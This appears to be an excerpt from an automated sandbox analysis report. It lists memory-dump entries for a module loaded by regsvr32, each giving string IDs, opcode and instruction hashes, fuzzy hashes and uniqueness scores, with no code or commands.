                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 27A$Cm)X
                                    • API String ID: 0-3608389941
                                    • Opcode ID: e0490a94f28e6ce23732593848f5f9e9112bddaf8c3b402d699b48d1b456956c
                                    • Instruction ID: 684b918ddde8746cffb287e87a4350d0062747792986074a3c358ea6f2ed809a
                                    • Opcode Fuzzy Hash: e0490a94f28e6ce23732593848f5f9e9112bddaf8c3b402d699b48d1b456956c
                                    • Instruction Fuzzy Hash: 15316FB46187848B8348DF28D59551ABBE5FBCC308F404B2DF4CAAB360D778D644CB4A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ?oCf$Wu
                                    • API String ID: 0-2445847193
                                    • Opcode ID: b07007c7df8fdcff1a3a12132ff18166943f80f753e521aa0974c7cb649c130d
                                    • Instruction ID: 6e752a1dbd70b7d88cda0fb1d20915d08c65693f2945daa64a17bfbf07288bfe
                                    • Opcode Fuzzy Hash: b07007c7df8fdcff1a3a12132ff18166943f80f753e521aa0974c7cb649c130d
                                    • Instruction Fuzzy Hash: 5E21AEB55187848B83489F28C44A41ABBE0FB8C70DF504B2DF8DAA6260D778D646CB4B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 0F6 $KO
                                    • API String ID: 0-276686719
                                    • Opcode ID: 6205ceb11bb6b662748add8c297f1b443fa17d6724776aa75fc58f5dae511f0b
                                    • Instruction ID: 15a0bfab9284e0424f8d805b4637dfad6d31782236c6d70db9798c35a47a8228
                                    • Opcode Fuzzy Hash: 6205ceb11bb6b662748add8c297f1b443fa17d6724776aa75fc58f5dae511f0b
                                    • Instruction Fuzzy Hash: AB21AD755283808FC368DF68C58614BBBF0FB86748F504A1DFAC686261D7B6D805CB47
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: p$tSA
                                    • API String ID: 0-3551818358
                                    • Opcode ID: 99011765d78b2b4d15352d42fcf875ddc55d3d35c100f7abdde6317782da955f
                                    • Instruction ID: dafa682f426fd7c4027cc0dc28289443c8a7082daafb3c1476061bf3b97c4e55
                                    • Opcode Fuzzy Hash: 99011765d78b2b4d15352d42fcf875ddc55d3d35c100f7abdde6317782da955f
                                    • Instruction Fuzzy Hash: 4A2169B45183858BD788DF28C54A50BBBE0BBCD74CF400B2DF4CAA6260D378D644CB4A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 8r.F$P?
                                    • API String ID: 0-1060054278
                                    • Opcode ID: 69901aac6ce1aef3d4959f7919bc5ecc16501e8ce7d01dbb2ce958a2c67dc727
                                    • Instruction ID: b2da1e8a0f89ffdbcd525e428a91df6a678b185604bab408c7dee67f2374b2b0
                                    • Opcode Fuzzy Hash: 69901aac6ce1aef3d4959f7919bc5ecc16501e8ce7d01dbb2ce958a2c67dc727
                                    • Instruction Fuzzy Hash: DC2179B45187849BC749DF68D44A41ABBE0BB9C71CF800B5DF4CAAA310D3B8D645CB4A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: <>
                                    • API String ID: 0-1927776135
                                    • Opcode ID: 37c3f39876e999beb0937df684067ca5812f0cda9578e561258942df6de8421c
                                    • Instruction ID: 9b9c084f2c1b1f08cb5858c99f1f27cbdd47ca95557f3058ff07422eb4e47033
                                    • Opcode Fuzzy Hash: 37c3f39876e999beb0937df684067ca5812f0cda9578e561258942df6de8421c
                                    • Instruction Fuzzy Hash: F742047190438C9BDBB9CFA8D8CA6DD7BB0FB58314F20421DD80A9B261DB745A85CF85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: j=
                                    • API String ID: 0-592141216
                                    • Opcode ID: 1169f1869d3fb428bfdad968f94ee3f32c89471e58a558a0d80dd63f76afa428
                                    • Instruction ID: 9003355423bafd58b5275d98cfc2247977288ca0e37ad1cbcdd73f3390e5cf1b
                                    • Opcode Fuzzy Hash: 1169f1869d3fb428bfdad968f94ee3f32c89471e58a558a0d80dd63f76afa428
                                    • Instruction Fuzzy Hash: 6BD1397150074D8BDF89DF28C89A6DE3BA0FB58398F55522CFC4AA6250C778D998CBC4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: !O
                                    • API String ID: 0-2378650393
                                    • Opcode ID: 302dfdcfbb7bb296299c3bc274bc73d8feb87790668f515a7c841834ed93dc2b
                                    • Instruction ID: 4170ec84c9d3f49002394f5178db7bb3edfe66952fd3c2890134f0e6da5031b0
                                    • Opcode Fuzzy Hash: 302dfdcfbb7bb296299c3bc274bc73d8feb87790668f515a7c841834ed93dc2b
                                    • Instruction Fuzzy Hash: F2E10A711087C88BDBFADF64C88ABDE3BACFB44748F105519EA0A9E258CB745748CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ^Lu
                                    • API String ID: 0-3854589714
                                    • Opcode ID: fb3768cccb7a26f6a89fbcd18e8308750f02c0f1f73e9d8b382492f454794486
                                    • Instruction ID: 7c859a126a25bd0c02bef77f14247f717a5a9adcaacfb9e6f8c6730b8303fd88
                                    • Opcode Fuzzy Hash: fb3768cccb7a26f6a89fbcd18e8308750f02c0f1f73e9d8b382492f454794486
                                    • Instruction Fuzzy Hash: E4A128709047498FCB9DCF68C88A6EEBBF1FF48384F204119EA46A7250D7759A85CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Z"
                                    • API String ID: 0-1896177830
                                    • Opcode ID: 85f6676341921d6f483625aa17b45c04f6466e2be55beb334fa49e51010a1540
                                    • Instruction ID: 91163448777d7afc4cc80e296cb9cfbd8772b1902329242c75d45222aab24025
                                    • Opcode Fuzzy Hash: 85f6676341921d6f483625aa17b45c04f6466e2be55beb334fa49e51010a1540
                                    • Instruction Fuzzy Hash: C0A165B590060DCFCBA8CF78D15A68E7BF1BB04308F606129EC269A262E774D619CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: e8f2
                                    • API String ID: 0-4239716772
                                    • Opcode ID: 3907476c53bac25a555e3ffc467f8b6ad850bf32927a98fe31c8bf9de770097f
                                    • Instruction ID: aaec5001b0b3f576b33a9a86a913a78c3f9fdfa8ed470970e8cb6047951b043a
                                    • Opcode Fuzzy Hash: 3907476c53bac25a555e3ffc467f8b6ad850bf32927a98fe31c8bf9de770097f
                                    • Instruction Fuzzy Hash: C491C37010078E8BDF49DF24D89A5DA3BA1FB58348F114618FC5A97294C7B8EA65CBC4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Qhm
                                    • API String ID: 0-202924511
                                    • Opcode ID: a2bb8b1411107b7575902c6661116fd2ce5bfac275bcbff6451e16fcd58631a3
                                    • Instruction ID: dff427aa29f5729145b0ab8b996757c093157db28b416262619acb8c77b37c14
                                    • Opcode Fuzzy Hash: a2bb8b1411107b7575902c6661116fd2ce5bfac275bcbff6451e16fcd58631a3
                                    • Instruction Fuzzy Hash: 1D511479517209CBCB69CF38D4D56E93BE0EF68344F20012DFC668B2A2DB70D5268B48
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: WZ'
                                    • API String ID: 0-1944904082
                                    • Opcode ID: 8b55f411d49b287bdfafef9dc47725f2bb274e5ab4be629ead2bc2b735d307b3
                                    • Instruction ID: 5b5aaaf1f09ca5557c90149fa64bb16396cbc43774f49a57b3b09e68a9cf408c
                                    • Opcode Fuzzy Hash: 8b55f411d49b287bdfafef9dc47725f2bb274e5ab4be629ead2bc2b735d307b3
                                    • Instruction Fuzzy Hash: F171087155878CDBDBBADF28C8897D937B1FB98304F908219D80E8E254DB785B4ACB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: -]
                                    • API String ID: 0-3195032325
                                    • Opcode ID: 2f387ab0a9f756c6099ceefcc45306d74e879ef7c324eb87884d154b92a960fc
                                    • Instruction ID: 01c3c27378e714c100c9a801295078fc99e5b088b1ed4129002e73aaaa485763
                                    • Opcode Fuzzy Hash: 2f387ab0a9f756c6099ceefcc45306d74e879ef7c324eb87884d154b92a960fc
                                    • Instruction Fuzzy Hash: 0151297010064D8BCB49DF28D4855D93FE1FB0C3ACF1A6318FD4AAA251D774D989CB88
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: }4}
                                    • API String ID: 0-922147943
                                    • Opcode ID: 13f685bfa53c13813d4a1c5d0eb0e1f62a0b1129b8c138172dc2148ffb4c9b25
                                    • Instruction ID: d7790a4c64fa8f9a696ea70ce14f4ff71b76161c227bc6b72ade158e86aff98b
                                    • Opcode Fuzzy Hash: 13f685bfa53c13813d4a1c5d0eb0e1f62a0b1129b8c138172dc2148ffb4c9b25
                                    • Instruction Fuzzy Hash: 3461F2B090075D8FCF48DFA4C88A5EEBBB0FB18348F114219E849B6250D7789A09CF95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: J_H
                                    • API String ID: 0-3345504573
                                    • Opcode ID: 917d428dc0055415592351f28073fdc95282f2729562562c1ca0dc8b4505919e
                                    • Instruction ID: 228b1474463df3943694e07488ce24e2c321c70e95dbe7fca5aca48057557888
                                    • Opcode Fuzzy Hash: 917d428dc0055415592351f28073fdc95282f2729562562c1ca0dc8b4505919e
                                    • Instruction Fuzzy Hash: EE71E3B1904789CBDBB9DFA4C8896DDBBB0FB48344F20421EDC5AAB251DBB45685CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 6p
                                    • API String ID: 0-4149211260
                                    • Opcode ID: 2ce6c019f8e175d8f04f96ba0abbac2df009c59e7d0a66d8d52c33c4e2d2dbc2
                                    • Instruction ID: 4bbd446beaef8e149afb4be24994101fb76057089ac3c5e28d57a25dd33f9813
                                    • Opcode Fuzzy Hash: 2ce6c019f8e175d8f04f96ba0abbac2df009c59e7d0a66d8d52c33c4e2d2dbc2
                                    • Instruction Fuzzy Hash: 5D512670D0470E8FDBA5CFA4C4863EEBBF0FB58344F208519E155B6251C7789A498BD6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: o-b
                                    • API String ID: 0-1062997908
                                    • Opcode ID: 576a5f5008345344db0b8e3d8b9e4c65842e933aac756182c5b50859cc037c1c
                                    • Instruction ID: 42124e7df8dcd8895505725edc86312d8ed31e4959f5f45477de907a66349d68
                                    • Opcode Fuzzy Hash: 576a5f5008345344db0b8e3d8b9e4c65842e933aac756182c5b50859cc037c1c
                                    • Instruction Fuzzy Hash: 5951177050064D8BDB94DF58C48A6DE3BE0FB28398F254219FC4AA6250D7789699CBC5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: >(O
                                    • API String ID: 0-1787487011
                                    • Opcode ID: b44782859c9866ecf0a367f2980fc160796e99ead2e04d39a5c7d0e6a088d4a1
                                    • Instruction ID: 047403745ffdf525a43130cb5f0cbada7355141308e198c8a6f422d75d1d2ed5
                                    • Opcode Fuzzy Hash: b44782859c9866ecf0a367f2980fc160796e99ead2e04d39a5c7d0e6a088d4a1
                                    • Instruction Fuzzy Hash: FB51D0B090078A8BCF4CDF64C8964EE7BB1FB48344F418A1DE966A6350D3B49665CFD4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 8:*
                                    • API String ID: 0-724269717
                                    • Opcode ID: e3fa9c188720ae3383b8778e69c2785bb5a3de525a41bd4bbc95f284b45543ac
                                    • Instruction ID: 711009871b2250b35f00fe0553413368f045348530dbac453829dc2cbdd56c12
                                    • Opcode Fuzzy Hash: e3fa9c188720ae3383b8778e69c2785bb5a3de525a41bd4bbc95f284b45543ac
                                    • Instruction Fuzzy Hash: DE519FB491074A8FCF48CF68D48A4DEBFB0FB68398F604519EC56AA250D37496A4CFD4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4330d8994c454f3a4ce2cb979804135e217ee49caa662d464dea2a0ef5ce2a30
                                    • Instruction ID: 53b90e1c5486c9cc5d3a4e2843fa79abd377b3644fddba8a35b35de5b3b72a9d
                                    • Opcode Fuzzy Hash: 4330d8994c454f3a4ce2cb979804135e217ee49caa662d464dea2a0ef5ce2a30
                                    • Instruction Fuzzy Hash: AA51A4B590038E8FCF48DF64C88A5DE7BB1FB48348F014A19E86AA6350D7B4D665CF85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f6e19dd2ecc4b4f98e7bd80107de5ee987440c0ef4aaf5382ea96953c73351d3
                                    • Instruction ID: e1ff16132d2196f3f75472eef2dbafaed56c0de40c9f91af0ed0f4743424dce2
                                    • Opcode Fuzzy Hash: f6e19dd2ecc4b4f98e7bd80107de5ee987440c0ef4aaf5382ea96953c73351d3
                                    • Instruction Fuzzy Hash: 7241E3B190034A8FCB48CF68C8865DE7FB1FB58358F10861DE85AAA360D77496A4CFD5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 00ebc5b3581f268e1dca31b076cde8af601d69c20f797ec800b8524e8aca152a
                                    • Instruction ID: 71fd5f9204d30feec7a15df1bf9f79d56724cbe4fb23e8fa5a2523106a8ad13f
                                    • Opcode Fuzzy Hash: 00ebc5b3581f268e1dca31b076cde8af601d69c20f797ec800b8524e8aca152a
                                    • Instruction Fuzzy Hash: 2C51B2B080034E9FCB48CFA8D48A4DEBFF0FB58398F245619E859A6250D3749695CFD5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1f4f6e8d1d7fb1cefad6bab8572f86962bf991beacb3f1c3af335354cec980e2
                                    • Instruction ID: 13dd754d1e7aaa458ccf3f25f1a53950ed55eb7a2af7c94b5f3f3eca6f4c7b71
                                    • Opcode Fuzzy Hash: 1f4f6e8d1d7fb1cefad6bab8572f86962bf991beacb3f1c3af335354cec980e2
                                    • Instruction Fuzzy Hash: 4141B3B090434E8FCB48DF68C48A4CE7FB0FB58398F204619E856A6250D3B496A5CFC5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b99b47e9b962ad4e889b98a468eb4c97838fe937d78fd3ed328a07435872d91a
                                    • Instruction ID: 25ea7a1fae7cee08e525b2e53d13b9e761fafe3c3046f9c16da3d4363f6b727f
                                    • Opcode Fuzzy Hash: b99b47e9b962ad4e889b98a468eb4c97838fe937d78fd3ed328a07435872d91a
                                    • Instruction Fuzzy Hash: 7641F0B090078E8BCF48CF68C88A4DE7FB0FB48358F54461DE86AA6350D3B49664CF85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 83981cbbf60b78e7deea3e04e91402b42a32efa8c5dfd88cb8f56556e6fb0c3c
                                    • Instruction ID: 2f3c92175ef08bfcd336efc03048a581a759bd19a61f5d08681f8b59d2b4a65d
                                    • Opcode Fuzzy Hash: 83981cbbf60b78e7deea3e04e91402b42a32efa8c5dfd88cb8f56556e6fb0c3c
                                    • Instruction Fuzzy Hash: CA41EF70508B898FE3A8DF29C48950BBBF2FBC5354F104A1DF69686360D7B5D845CB42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 94030778b375274538e88af110c4c71a5f626c7493089532c44927a023a09910
                                    • Instruction ID: 881360cf52284626b478287e7223753f8540b5b8a242225130398fb52c45b4e6
                                    • Opcode Fuzzy Hash: 94030778b375274538e88af110c4c71a5f626c7493089532c44927a023a09910
                                    • Instruction Fuzzy Hash: 9141B1B090034E8FCF48CF68C48A5DEBFB0FB68398F214619E855A6250D3B496A5CFC5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 93974b6d4f6273d20610df347467165d2a5c3046e1daec97411395bd01693f1f
                                    • Instruction ID: 9c4ff176952ec0d3a7c23327861baecbe751e07bc56d6e6d0065064954d6898b
                                    • Opcode Fuzzy Hash: 93974b6d4f6273d20610df347467165d2a5c3046e1daec97411395bd01693f1f
                                    • Instruction Fuzzy Hash: D93113B0508B84CBD7B4DF24C08979ABBE0FBC4758F608A1CE5D9C6261DBB4984DDB42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 613fb402d6b778ceaf7e513f493c666c428009a0501ff02ca6debf04feb91865
                                    • Instruction ID: 2086fc6cf530452ca317dde1c3f5989bf97dc2ab51b7d711b1b7619edf53518f
                                    • Opcode Fuzzy Hash: 613fb402d6b778ceaf7e513f493c666c428009a0501ff02ca6debf04feb91865
                                    • Instruction Fuzzy Hash: 9A4107B090034D9FCF48DF68C89A5DEBFB1FB48358F10865DE96AA6250D3B49664CF84
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a391d5f1ee034caf47bfedc7cfbee3ee0130da0d99d6425c5f03999ced993457
                                    • Instruction ID: 1338ccaed59e81eda3dfb0132a5285c9e75a0d4e8ad1c64b0ac71650cc1258ea
                                    • Opcode Fuzzy Hash: a391d5f1ee034caf47bfedc7cfbee3ee0130da0d99d6425c5f03999ced993457
                                    • Instruction Fuzzy Hash: 5541E4B190075ECFCF44CFA8D88A4CE7BF0FB08358F144619E869A6210D3B49658CF99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fd33be4bf54c8c25dddb299aef1f30db163f836ea6c92e4bd2e4a70074cec26c
                                    • Instruction ID: 90c54515c462ca516bd1a7834683e0366852147f904ce70d700c1fd94530822e
                                    • Opcode Fuzzy Hash: fd33be4bf54c8c25dddb299aef1f30db163f836ea6c92e4bd2e4a70074cec26c
                                    • Instruction Fuzzy Hash: D33198B16187848BD788DF28D44941ABBE1FBDC30CF405B1DF4CAAA360D7789644CB4A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4dc2512c0ff6dc22a4fb7ff1d0ea1563faee4dc38c2ddbd287c0bb24e1b40528
                                    • Instruction ID: 9655ad274102c7f9d75b202b541ab5cd2305fe15ce58f1dcda736dbe1a9cecaf
                                    • Opcode Fuzzy Hash: 4dc2512c0ff6dc22a4fb7ff1d0ea1563faee4dc38c2ddbd287c0bb24e1b40528
                                    • Instruction Fuzzy Hash: 3B2146B46183858B8389DF28D04A41ABBE1FBCC308F905B1DF4CAAB254D77896558B4B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 443cbba6f5f89cfce6496fb7e303af42859a42b87001d497a7063cf79c72ec44
                                    • Instruction ID: 28a8b9ee08791f4b35668e747dad36529c2fac2b53c208ad34d18e94405bcf7a
                                    • Opcode Fuzzy Hash: 443cbba6f5f89cfce6496fb7e303af42859a42b87001d497a7063cf79c72ec44
                                    • Instruction Fuzzy Hash: 8E21D870529784ABC788DF18C58A55ABBF0FBC5758F80691DF8C686251C7B4D906CB43
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
